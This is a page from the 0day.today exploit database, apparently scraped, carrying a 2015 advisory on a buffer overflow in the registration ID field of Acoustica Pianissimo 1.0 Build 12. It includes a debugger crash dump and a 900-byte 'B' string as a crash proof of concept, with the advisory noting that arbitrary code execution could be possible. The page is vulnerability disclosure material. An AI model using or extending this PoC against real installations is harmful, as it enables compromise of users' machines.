0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC

Author

LiquidWorm

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC


Vendor: Acoustica, Inc.
Product web page: http://www.acoustica.com
Affected version: 1.0 Build 12

Summary: Pianissimo virtual piano uses a combination of sample
playback and advanced physical modeling to create a stunning
acoustic grand piano sound. Starting with 250 MB of high quality
samples of a SteinwayтДв Model D grand piano, Pianissimo uses
complex signal processing and programming to recreate the warmth,
response, and playability of a real grand piano.

Desc: The vulnerability is caused due to a boundary error in the
processing of a user input in the registration id field of the
registration procedure, which can be exploited to cause a buffer
overflow when a user inserts long array of string for the ID.
Successful exploitation could allow execution of arbitrary code
on the affected machine.

-----------------------------------------------------------------

(b98.1790): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\VST\Pianissimo\Pianissimo.dll - 
eax=00000000 ebx=532d0245 ecx=bdeec3ea edx=00000049 esi=4a18d43c edi=06c07739
eip=061fbda7 esp=00184a28 ebp=4d2d0276 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
Pianissimo!CRefObj::SeekToData+0x4127:
061fbda7 8b86dc200000    mov     eax,dword ptr [esi+20DCh] ds:002b:4a18f518=????????
0:000> d esp-1000
00183a28  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a38  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a48  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a58  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a68  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a78  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a88  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a98  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
0:000> u 061fbda7
Pianissimo!CRefObj::SeekToData+0x4127:
061fbda7 8b86dc200000    mov     eax,dword ptr [esi+20DCh]
061fbdad 50              push    eax
061fbdae 6a30            push    30h
061fbdb0 681cc52c06      push    offset Pianissimo!CRefObj::Tell+0x45bfc (062cc51c)
061fbdb5 6810c52c06      push    offset Pianissimo!CRefObj::Tell+0x45bf0 (062cc510)
061fbdba e841f8ffff      call    Pianissimo!CRefObj::SeekToData+0x3980 (061fb600)
061fbdbf 83c410          add     esp,10h
061fbdc2 8ac3            mov     al,bl

-----------------------------------------------------------------

Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
           Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit


16.03.2015

--

900 bytes:
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
11111-11111-11111-11111

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC

Report Error

Report Error